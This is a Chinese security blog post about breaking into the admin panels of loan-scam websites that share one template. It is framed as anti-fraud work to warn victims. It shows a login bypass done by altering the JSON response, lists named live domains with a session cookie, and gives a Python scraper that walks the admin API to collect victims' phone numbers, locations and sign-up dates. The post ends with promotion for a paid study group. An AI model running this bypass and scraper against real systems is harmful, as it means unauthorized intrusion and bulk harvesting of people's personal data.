贷款诈骗 x 摸版0day + 实战预警脚本

  • A+
所属分类:安全闲碎

本文作者:mzfuzzMs08067实验室 核心成员


前言

日常渗透测试中,不间断的测试会让自己有一种重复劳动的感觉,同时也越来越觉得技术如果要提现其价值,关键要看要看如何去操作技术输入的价值。

虽然是从下面自己只花费不到几个小时,这只是日常工作的一部分。

同时圈子里应该有做此类业务的同行,也希望能借此帮更多的人。

同时希望能认识更多的做反诈的人员,一起学习,一起了解新tip。

我自己有收集各类诈骗网站的0day和各种漏洞库,我会共享,欢迎骚扰!!

 

挖掘贷款摸版漏洞--》发现同摸版网站--》利用漏洞数据解析整理 --》 输入预警受害人!!



贷款摸版x漏洞

网站案例:pajr1.ygbnca.top#

贷款诈骗 x 摸版0day + 实战预警脚本

 

网站后台:

pajr1.admin.ygbnca.top

贷款诈骗 x 摸版0day + 实战预警脚本

 

网站漏洞:

直接修改后台登录返回包json字段

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 09 Sep2020 04:30:55 GMT

Content-Type:application/json; charset=utf-8

Content-Length:67

Connection: close

ETag:W/"43-Y6MfBUqxiWugFPgNS2kafYJXCks"

Set-Cookie:phpsession=s%3ATbyQ4x_nVrjE1pKuqhGfI1S3Dzd60cNi.Fsxsm9rZAVxLktelnx5ddZjMmJFwE7weWwTChRZv1WY;Path=/; HttpOnly

Vary:Accept-Encoding

 

{"success":true,"error":"","errcode":0,"data":{"username":"admin"}}

 

贷款诈骗 x 摸版0day + 实战预警脚本

 


数据爬取思路

爬取后台近2天的注册人信息进行预警,通过空间引擎进行通摸版进行匹配。
然后批量进行后台2天注册人信息整理。

具体python 脚本见下面:

import requests

import urllib3

fromconcurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor

from lxml importetree

from phone importPhone

from openpyxlimport Workbook

import os

import datetime

import mzfuzz

import re

from phone importPhone

urllib3.disable_warnings()

 

 

headers1="""

Host:pajr1.admin.ygbnca.top

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/85.0.4183.83 Safari/537.36

uid: null

Accept: */*

Referer: http://pajr1.admin.ygbnca.top/admin/user

Accept-Encoding:gzip, deflate

Accept-Language:zh-CN,zh;q=0.9,en;q=0.8

Cookie:__utmc=172029730;__utma=17661233.1050237378.1599625263.1599625263.1599625263.1; __utmc=17661233;__utmz=17661233.1599625263.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);phpsession=s%3ATbyQ4x_nVrjE1pKuqhGfI1S3Dzd60cNi.Fsxsm9rZAVxLktelnx5ddZjMmJFwE7weWwTChRZv1WY;__utmz=172029730.1599644805.2.2.utmcsr=fofa.so|utmccn=(referral)|utmcmd=referral|utmcct=/result;__utma=172029730.1899440815.1599623231.1599721167.1599725375.4;__utmb=172029730.1.9.1599725375

Connection: close

"""

 

headers=mzfuzz.ls_header(headers1)

 

 

today1 =datetime.date.today()

oneday=datetime.timedelta(days=2)

yesday1=today1-oneday

yesday=str(yesday1).replace('2020-','')

today=str(today1).replace('2020-','')

 

 

# print(yesday)

call=Phone()

 

 

#获取userid

defhtmldowns02(domain):

    try:

        uid=htmldown03(domain)

        uid=int(uid)

        forpage in range(uid,57,-1):

            print(page)

            fori in range(0,4):

                try:

                    url=f"{domain}/api/v1/admin/members/detail?user_id={page}"

                    res=requests.get(url,headers=headers,timeout=6)

                    withopen(f'daikuans/userinfos.txt','a+',encoding="utf-8") as f:

                        f.write(res.text)

                        f.write('aaaaaa')

                    aa=res.text

                    try:

                        #print(aa)

                        cal=re.findall('"mobile":(.*?),',aa)

                        #address=re.findall('"now_detail_address":"(.*?)"',aa)

                        created_at=re.findall('"created_at":"(.*?)"',aa)

                        #print(address)

                        call1=call.find(cal[0])

                        pro=call1['province']

                        ci=call1['city']

 

 

                        info=cal[0]+'t'+pro+'t'+ci+'t'+created_at[0]+'t'+domain

                        withopen(f'daikuans/{today}.txt','a+',encoding='utf-8') as f:

                            f.write(info)

                            f.write('n')

                        print(info)

                    #print(address[0])

                    exceptException as e:

                        print(e)

                        pass

 

 

 

 

                    print(f"page={page}")

 

 

                    break

                exceptException as e:  

                    print(e)

                    pass

            #print(info)

            ifstr(yesday) in str(created_at):

                print(yesday)

                print(created_at)

                break

 

 

            else:

                print('yes')

    except:

        pass

 

 


#获取最大uid

defhtmldown03(domain):

    fori in range(0,4):

        try:

            url=f"{domain}/api/v1/admin/members/list?mobile=&page=1"

            res=requests.get(url,headers=headers,timeout=6)

            af=res.text

            #print(af)

            uid=re.findall('"user_id":(.*?),',af)

            print(f'uid-- > {uid[0]}')

 

 

 

 

            returnuid[0]

        exceptException as e:  

            print(e)

            pass

 

 

总结下一天预警的量:

1天网站全国贷款被骗人员16000+(统计于200+xx贷款网站),分布在200-300网站之间。这已经接近我另一种方式预警的一天的量。如今贷款摸版再多应该也不会多多少。所以如果做好应该会降低各地案发还是有效果。 具体如何预警,有些思路已经在代码里了,这里就不多说了!!!

 

 

总结:

文章其实漏洞很简单,还是前文所提。
有些站的漏洞修的也很快,有些更有方向的tip(比如跨境赌博|溯源|虚拟币|跑分),这些也是比较好的出路。
希望能认识越来越多的人,能多个路子,我能共享的是我自己挖到0day(仅限非法)!

 

 




扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

贷款诈骗 x 摸版0day + 实战预警脚本 贷款诈骗 x 摸版0day + 实战预警脚本

贷款诈骗 x 摸版0day + 实战预警脚本 贷款诈骗 x 摸版0day + 实战预警脚本 贷款诈骗 x 摸版0day + 实战预警脚本

目前30000+人已关注加入我们

贷款诈骗 x 摸版0day + 实战预警脚本

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: